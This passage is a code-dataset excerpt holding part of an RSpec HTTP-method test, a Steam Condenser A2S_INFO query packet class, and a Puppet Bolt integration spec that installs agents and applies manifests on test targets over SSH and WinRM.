context 'when options specify no methods' do
it 'returns Net::HTTP::Get' do
expect(described_class.get_method(options)).to eq(Net::HTTP::Get)
end
end
context 'when options contain the :get method' do
before(:each) { options[:method] = :get }
it 'returns Net::HTTP::Get' do
expect(described_class.get_method(options)).to eq(Net::HTTP::Get)
end
end
context 'when options contain the :post method' do
before(:each) { options[:method] = :post }
it 'returns Net::HTTP::Post' do
expect(described_class.get_method(options)).to eq(Net::HTTP::Post)
end
end
context 'when options contain the :post_multipart method' do
before(:each) { options[:method] = :post_multipart }
it 'returns Net::HTTP::Post::Multipart' do
expect(described_class.get_method(options)).to eq(Net::HTTP::Post::Multipart)
end
end
context 'when options contain the :delete method' do
before(:each) { options[:method] = :delete }
it 'returns Net::HTTP::Delete' do
expect(described_class.get_method(options)).to eq(Net::HTTP::Delete)
end
end
end
end
| 28.658863 | 105 | 0.675108 |
1812242055b1b852f3882900b5f4b65544c523f2 | 728 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2008-2012, Sebastian Staudt
require 'steam-condenser/servers/packets/base_packet'
module SteamCondenser::Servers::Packets
# This packet class class represents a A2S_INFO request send to a game server
#
# It will cause the server to send some basic information about itself, e.g.
# the running game, map and the number of players.
#
# @author Sebastian Staudt
# @see GameServer#update_server_info
class A2S_INFO_Packet
include BasePacket
# Creates a new A2S_INFO request object
def initialize
super A2S_INFO_HEADER, "Source Engine Query\0"
end
end
end
| 26 | 79 | 0.741758 |
ab060339fdc5e01cf78ef9b9cec48cc14b1c8e0d | 20,915 | # frozen_string_literal: true
require 'spec_helper'
require 'bolt_spec/conn'
require 'bolt_spec/files'
require 'bolt_spec/integration'
require 'bolt_spec/puppet_agent'
require 'bolt_spec/run'
describe "apply", expensive: true do
include BoltSpec::Conn
include BoltSpec::Files
include BoltSpec::Integration
include BoltSpec::PuppetAgent
include BoltSpec::Run
let(:modulepath) { File.join(__dir__, '../fixtures/apply') }
let(:hiera_config) { File.join(__dir__, '../fixtures/configs/empty.yml') }
let(:config_flags) { %W[--format json --targets #{uri} --password #{password} --modulepath #{modulepath}] + tflags }
describe 'over ssh', ssh: true do
let(:uri) { conn_uri('ssh') }
let(:user) { conn_info('winrm')[:user] }
let(:password) { conn_info('ssh')[:password] }
let(:tflags) { %W[--no-host-key-check --run-as root --sudo-password #{password}] }
def root_config
{ 'modulepath' => File.join(__dir__, '../fixtures/apply') }
end
def agent_version_inventory
inventory = docker_inventory(root: true)
inventory['groups'] << {
'name' => 'agent_targets',
'groups' => [
{ 'name' => 'puppet_5',
'targets' => ['puppet_5_node'] },
{ 'name' => 'puppet_6',
'targets' => ['puppet_6_node'] }
]
}
inventory
end
def lib_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'puppet_agent'
}
}
}] }
end
def error_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'name' => 'error',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'prep::error'
}
}
}, {
'uri' => conn_uri('ssh'),
'name' => 'success',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'puppet_agent'
}
}
}, {
# These fail the puppet_agent::version check if they're fake. Seems
# like more effort than it's worth to mock them
'uri' => conn_uri('ssh'),
'name' => 'badparams',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'puppet_agent::install',
'parameters' => {
'collection' => 'The act or process of collecting.'
}
}
}
}, {
'uri' => conn_uri('ssh'),
'name' => 'badplugin',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'what plugin?'
}
}
}] }
end
def task_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'puppet_agent::install',
'parameters' => { 'version' => '6.2.0' }
}
}
}],
'config' => root_config }
end
after(:all) do
ssh_node = conn_uri('ssh', include_password: true)
uninstall([ssh_node, 'agent_targets'], inventory: agent_version_inventory)
end
context "when running against puppet 5 or puppet 6" do
before(:all) do
# install puppet5
install('puppet_5', collection: 'puppet5', inventory: agent_version_inventory)
result = run_task('puppet_agent::version', 'puppet_5', {}, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^5/)
# install puppet6
result = run_task('puppet_agent::install', 'puppet_6', { 'collection' => 'puppet6' },
config: root_config, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', 'puppet_6', {}, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6/)
end
it 'runs a ruby task' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[task run basic::ruby_task --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results['items'].each do |result|
expect(result['status']).to eq('success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[plan run basic::notify --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results.each do |result|
expect(result['status']).to eq('success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'succeeds with an empty hiera config' do
with_tempfile_containing('bolt', YAML.dump("hiera-config" => hiera_config), '.yaml') do |conf|
results = run_cli_json(%W[plan run prep --configfile #{conf.path}] + config_flags)
results.each do |result|
expect(result['status']).to eq('success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{uri}]")
end
end
end
it 'gets resources' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[plan run basic::resources --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results.each do |result|
expect(result['status']).to eq('success')
resources = result['result']['resources']
expect(resources.map { |r| r['type'] }.uniq).to eq(%w[User File])
expect(resources.select { |r| r['title'] == user && r['type'] == 'User' }.count).to eq(1)
expect(resources.select { |r| r['title'] == '/tmp' && r['type'] == 'File' }.count).to eq(1)
end
end
end
it 'does not create Boltdir' do
inventory_data = agent_version_inventory
is_boltdir = "if [ -d ~/.puppetlabs ]; then echo 'exists'; else echo 'not found'; fi"
results = run_command(is_boltdir, 'agent_targets', inventory: inventory_data)
results.each do |result|
expect(result['status']).to eq('success')
expect(result['result']['stdout']).to match(/not found/)
end
end
end
context "when installing puppet" do
before(:each) do
uninstall = '/opt/puppetlabs/bin/puppet resource package puppet-agent ensure=absent'
run_cli_json(%W[command run #{uninstall}] + config_flags)
end
context 'with plugin configured' do
let(:config_flags) { %W[--format json -n all --password #{password} --modulepath #{modulepath}] + tflags }
let(:ssh_node) { conn_uri('ssh', include_password: true) }
before(:each) do
uninstall(ssh_node)
end
it 'with puppet_agent plugin configured installs the agent' do
with_tempfile_containing('inventory', YAML.dump(lib_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
end
end
it 'errors appropriately per target' do
with_tempfile_containing('inventory', YAML.dump(error_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result['kind']).to eq('bolt/run-failure')
expect(result['msg']).to eq("Plan aborted: apply_prep failed on 3 targets")
result_set = result['details']['result_set']
task_error = result_set.select { |h| h['node'] == 'error' }[0]['result']['_error']
expect(task_error['kind']).to eq('puppetlabs.tasks/task-error')
expect(task_error['msg']).to include("The task failed with exit code 1")
param_error = result_set.select { |h| h['node'] == 'badparams' }[0]['result']['_error']
expect(param_error['kind']).to eq('bolt/plugin-error')
expect(param_error['msg']).to include("Invalid parameters for Task puppet_agent::install")
plugin_error = result_set.select { |h| h['node'] == 'badplugin' }[0]['result']['_error']
expect(plugin_error['kind']).to eq('bolt/unknown-plugin')
expect(plugin_error['msg']).to include("Unknown plugin: 'what plugin?'")
end
end
it 'with task plugin configured installs the agent' do
with_tempfile_containing('inventory', YAML.dump(task_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
result = run_cli_json(%W[task run puppet_agent::version -i #{inv.path}] + config_flags)['items']
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6\.2/)
end
end
end
it 'succeeds when run twice' do
result = run_cli_json(%w[plan run prep] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
# Includes agent facts from apply_prep
agent_facts = report['resource_statuses']['Notify[agent facts]']['events'][0]['desired_value'].split("\n")
expect(agent_facts[0]).to match(/^\w+/)
expect(agent_facts[1]).to eq(agent_facts[0])
expect(agent_facts[2]).to match(/^\d+\.\d+\.\d+$/)
expect(agent_facts[3]).to eq(agent_facts[2])
expect(agent_facts[4]).to eq('false')
result = run_cli_json(%w[plan run prep] + config_flags)
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
end
end
context "with a puppet_agent installed" do
before(:all) do
# Deferred must use puppet >= 6
target = 'puppet_6'
install(target, inventory: agent_version_inventory)
result = run_task('puppet_agent::version', target, {}, config: root_config, inventory: agent_version_inventory)
major_version = result.first['result']['version'].split('.').first.to_i
expect(major_version).to be >= 6
end
context "apply() function" do
it 'errors when there are resource failures' do
result = run_cli_json(%w[plan run basic::failure] + config_flags, rescue_exec: true)
expect(result).to include('kind' => 'bolt/apply-failure')
error = result['details']['result_set'][0]['result']['_error']
expect(error['kind']).to eq('bolt/resource-failure')
expect(error['msg']).to match(/Resources failed to apply/)
end
it 'applies a notify and ignores local settings' do
run_command('echo environment=doesnotexist > /etc/puppetlabs/puppet/puppet.conf',
uri, config: root_config, inventory: conn_inventory)
result = run_cli_json(%w[plan run basic::class] + config_flags)
expect(result).not_to include('kind')
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['_output']).to eq('changed: 1, failed: 0, unchanged: 0 skipped: 0, noop: 0')
resources = result[0]['result']['report']['resource_statuses']
expect(resources).to include('Notify[hello world]')
end
it 'applies the deferred type' do
result = run_cli_json(%w[plan run basic::defer] + config_flags)
expect(result).not_to include('kind')
expect(result[0]['status']).to eq('success')
resources = result[0]['result']['report']['resource_statuses']
local_pid = resources['Notify[local pid]']['events'][0]['desired_value'][/(\d+)/, 1]
raise 'local pid was not found' if local_pid.nil?
remote_pid = resources['Notify[remote pid]']['events'][0]['desired_value'][/(\d+)/, 1]
raise 'remote pid was not found' if remote_pid.nil?
expect(local_pid).not_to eq(remote_pid)
end
it 'respects _run_as on a plan invocation' do
user = conn_info('ssh')[:user]
logs = run_cli_json(%W[plan run basic::run_as_apply user=#{user}] + config_flags)
expect(logs.first['message']).to eq(conn_info('ssh')[:user])
end
end
context "bolt apply command" do
it "applies a manifest" do
with_tempfile_containing('manifest', 'include basic', '.pp') do |manifest|
results = run_cli_json(['apply', manifest.path] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
end
it "applies with noop" do
with_tempfile_containing('manifest', 'include basic', '.pp') do |manifest|
results = run_cli_json(['apply', manifest.path, '--noop'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'unchanged', 'noop' => true)
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
end
it "applies a snippet of code" do
results = run_cli_json(['apply', '-e', 'include basic'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
it "applies a node definition" do
results = run_cli_json(['apply', '-e', 'node default { notify { "hello world": } }'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
it "fails if the manifest doesn't parse" do
expect { run_cli_json(['apply', '-e', 'include(basic'] + config_flags) }
.to raise_error(/Syntax error/)
end
it "fails if the manifest doesn't compile" do
results = run_cli_json(['apply', '-e', 'include shmasic'] + config_flags)
result = results[0]['result']
expect(result).to include('_error')
expect(result['_error']['kind']).to eq('bolt/apply-error')
expect(result['_error']['msg']).to match(/failed to compile/)
end
end
end
end
describe 'over winrm on Windows with Puppet Agents', windows_agents: true do
let(:uri) { conn_uri('winrm') }
let(:password) { conn_info('winrm')[:password] }
let(:user) { conn_info('winrm')[:user] }
def config
{ 'modulepath' => File.join(__dir__, '../fixtures/apply'),
'winrm' => {
'ssl' => false,
'ssl-verify' => false,
'user' => conn_info('winrm')[:user],
'password' => conn_info('winrm')[:password]
} }
end
context "when running against puppet 5" do
before(:all) do
result = run_task('puppet_agent::install', conn_uri('winrm'),
{ 'collection' => 'puppet5' }, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', conn_uri('winrm'), {}, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^5/)
end
it 'runs a ruby task' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[task run basic::ruby_task --targets #{uri}
--configfile #{conf.path}])
results['items'].each do |result|
expect(result).to include('status' => 'success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[plan run basic::notify --targets #{uri}
--configfile #{conf.path}])
results.each do |result|
expect(result).to include('status' => 'success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'does not create Boltdir' do
is_boltdir = "if (!(Test-Path ~/.puppetlabs)) {echo 'not found'}"
results = run_command(is_boltdir, conn_uri('winrm'), config: config)
results.each do |result|
expect(result).to include('status' => 'success')
expect(result['result']['stdout']).to match(/not found/)
end
end
end
context "when running against puppet 6" do
before(:all) do
result = run_task('puppet_agent::install', conn_uri('winrm'),
{ 'collection' => 'puppet6', 'version' => 'latest' }, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', conn_uri('winrm'), {}, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6/)
end
it 'runs a ruby task' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[task run basic::ruby_task --targets #{uri}
--configfile #{conf.path}])
results['items'].each do |result|
expect(result).to include('status' => 'success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[plan run basic::notify --targets #{uri}
--configfile #{conf.path}])
results.each do |result|
expect(result).to include('status' => 'success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'does not create Boltdir' do
is_boltdir = "if (!(Test-Path ~/.puppetlabs)) {echo 'not found'}"
results = run_command(is_boltdir, conn_uri('winrm'), config: config)
results.each do |result|
expect(result).to include('status' => 'success')
expect(result['result']['stdout']).to match(/not found/)
end
end
end
end
end
| 41.83 | 119 | 0.568826 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.